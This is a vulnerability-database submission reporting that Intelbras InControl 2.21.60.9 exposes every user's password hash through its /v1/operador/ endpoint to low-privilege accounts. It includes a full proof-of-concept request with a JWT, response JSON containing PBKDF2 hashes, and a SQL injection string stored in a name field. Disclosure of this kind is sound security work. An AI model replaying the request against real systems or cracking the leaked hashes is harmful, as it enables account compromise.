Submeter #579544: Intelbras InControl 2.21.60.9 Information Disclosureinformação

TítuloIntelbras InControl 2.21.60.9 Information Disclosure
DescriçãoThere is a Password Hash disclosure in the InControl application. There are three types of users: Admin, Recepcionista and Porteiro. Every type of user can make a GET request in the users "/v1/operador/" endpoint, which lists every user registered in the application. This endpoint returns a JSON object that contains a lot of information about the users, including id, username, password (hashed), and other informations. Here is an example of the GET request with Recepcionista privileges (which in the frontend it doesn't have permission to list users): GET /v1/operador/ HTTP/1.1 Host: localhost:4441 Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozLCJ1c2VybmFtZSI6ImNlc2FyIiwiZXhwIjoxNzQ3NTAzODE4LCJlbWFpbCI6IiIsImlzX2FjdGl2ZSI6dHJ1ZSwiaXNfc3VwZXJ1c2VyIjpmYWxzZSwicGVzc29hIjp7Im5vbWUiOiJhcm5hbGRvIn0sInBlcm1pc3Npb25zIjp7ImNyZWRlbmNpYWwiOnsiY29udHJvbGVyZW1vdG8iOnsiaWRfcGVybWlzc2FvX3ZpZXciOjI2OH0sImhpc3RvcmljYWxiaW9tZXRyaWFkaWdpdGFsIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI0OSwiaWRfcGVybWlzc2FvX2NoYW5nZSI6MjUwLCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyNTEsImlkX3Blcm1pc3Nhb192aWV3IjoyNTJ9fSwiZXZlbnRvX29wZXJhZG9yIjp7Imhpc3RvcmljYWxldmVudG9vcGVyYWRvciI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxODEsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjE4MiwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTgzLCJpZF9wZXJtaXNzYW9fdmlldyI6MTg0fX0sImdydXBvX3BvbnRvc19hY2Vzc28iOnsiaGlzdG9yaWNhbGdydXBvcG9udG9zYWNlc3NvIjp7ImlkX3Blcm1pc3Nhb19hZGQiOjI5NywiaWRfcGVybWlzc2FvX2NoYW5nZSI6Mjk4LCJpZF9wZXJtaXNzYW9fZGVsZXRlIjoyOTksImlkX3Blcm1pc3Nhb192aWV3IjozMDB9fSwidXN1YXJpbyI6eyJjYW1wb3NwZXJzb25hbGl6YWRvcyI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMTcsImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjExOCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTE5LCJpZF9wZXJtaXNzYW9fdmlldyI6MTIwfSwidXNlcnNncm91cCI6eyJpZF9wZXJtaXNzYW9fYWRkIjoxMjksImlkX3Blcm1pc3Nhb19jaGFuZ2UiOjEzMCwiaWRfcGVybWlzc2FvX2RlbGV0ZSI6MTMxLCJpZF9wZXJtaXNzYW9fdmlldyI6MTMyfX19fQ.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc Accept-Language: pt-BR,pt;q=0.9 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Origin: https://localhost:4445 Referer: https://localhost:4445/ Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- And here is an example of the HTTP response with disclosure of password hashes: HTTP/1.1 200 OK Date: Fri, 16 May 2025 19:02:07 GMT Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7 Vary: Accept,Origin,Cookie Allow: GET, POST, DELETE, HEAD, OPTIONS Content-Length: 40484 Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json {"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,
Fonte⚠️ https://localhost:4441/v1/operador/
Utilizador
 lorenzomoulin (UID 33175)
Submissão16/05/2025 21h07 (há 11 meses)
Moderação04/08/2025 07h41 (3 months later)
EstadoAceite
Entrada VulDB318641 [Intelbras InControl 2.21.60.9 JSON Endpoint /v1/operador/ Divulgação de Informação]
Pontos20

VoltarVisão GeralPróximo

Want to know what is going to be exploited?

We predict KEV entries!